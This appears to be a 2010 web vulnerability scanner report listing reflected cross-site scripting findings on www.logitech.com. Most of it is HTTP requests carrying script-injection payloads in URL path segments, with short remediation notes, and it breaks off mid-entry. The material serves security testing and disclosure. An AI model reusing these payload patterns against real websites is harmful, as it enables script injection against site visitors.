<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ac07"><script>alert(1)</script>97157e42f5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/349/67759ac07"><script>alert(1)</script>97157e42f5 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cf44"><script>alert(1)</script>6b9841d87ce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us3cf44"><script>alert(1)</script>6b9841d87ce/349/7073 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47f76"%3bfd7a8e7c391 was submitted in the REST URL parameter 1. This input was echoed as 47f76";fd7a8e7c391 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us47f76"%3bfd7a8e7c391/349/7073 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 92b52</script><script>alert(1)</script>a773f1bfa5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /92b52</script><script>alert(1)</script>a773f1bfa5/349/7073 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db199"><script>alert(1)</script>0ec9d835d4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/349db199"><script>alert(1)</script>0ec9d835d4e/7073 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 716af</script><script>alert(1)</script>881478f03b7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/349716af</script><script>alert(1)</script>881478f03b7/7073 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14603"><script>alert(1)</script>c056dd9fee1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/349/707314603"><script>alert(1)</script>c056dd9fee1 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14687</script><script>alert(1)</script>59ccc27ac9c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/349/707314687</script><script>alert(1)</script>59ccc27ac9c HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec795"%3bc8ac63c2a7f was submitted in the REST URL parameter 1. This input was echoed as ec795";c8ac63c2a7f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-usec795"%3bc8ac63c2a7f/349/7393 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ee26"><script>alert(1)</script>6841bfbfbe4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us2ee26"><script>alert(1)</script>6841bfbfbe4/349/7393 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f39bb</script><script>alert(1)</script>d0ecba208c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /f39bb</script><script>alert(1)</script>d0ecba208c3/349/7393 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7baf1</script><script>alert(1)</script>75e1f767a3a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/3497baf1</script><script>alert(1)</script>75e1f767a3a/7393 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2728"><script>alert(1)</script>459434c9ec7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/349d2728"><script>alert(1)</script>459434c9ec7/7393 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8bd82</script><script>alert(1)</script>e46a071140c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/349/73938bd82</script><script>alert(1)</script>e46a071140c HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ec80"><script>alert(1)</script>03d57a6218f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/349/73936ec80"><script>alert(1)</script>03d57a6218f HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe0a3"><script>alert(1)</script>28e2f5b7a20 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-usfe0a3"><script>alert(1)</script>28e2f5b7a20/403/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b783</script><script>alert(1)</script>be912242e94 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /6b783</script><script>alert(1)</script>be912242e94/403/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49c68</script><script>alert(1)</script>1a12fe97229 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/40349c68</script><script>alert(1)</script>1a12fe97229/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff114"><script>alert(1)</script>8d222ec8a80 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/403ff114"><script>alert(1)</script>8d222ec8a80/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c84f1</script><script>alert(1)</script>fd42d3974fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c84f1</script><script>alert(1)</script>fd42d3974fd/403/&legacy=1 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/search?q=%60
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:54 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 668ca"><script>alert(1)</script>a25658b7d5f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us668ca"><script>alert(1)</script>a25658b7d5f/403/&legacy=1 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/search?q=%60
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28e31</script><script>alert(1)</script>f910518a1de was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/40328e31</script><script>alert(1)</script>f910518a1de/&legacy=1 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/search?q=%60
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40dce"><script>alert(1)</script>6a1921695be was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/40340dce"><script>alert(1)</script>6a1921695be/&legacy=1 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/search?q=%60
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c9ce"%3b1f5403205ae was submitted in the REST URL parameter 1. This input was echoed as 7c9ce";1f5403205ae in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us7c9ce"%3b1f5403205ae/434/7288 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81c82</script><script>alert(1)</script>86f1d1f3dd1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /81c82</script><script>alert(1)</script>86f1d1f3dd1/434/7288 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cf76"><script>alert(1)</script>d912e138453 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us8cf76"><script>alert(1)</script>d912e138453/434/7288 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10c56"><script>alert(1)</script>6a0149ddc29 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/43410c56"><script>alert(1)</script>6a0149ddc29/7288 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80972</script><script>alert(1)</script>fdf704983fa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
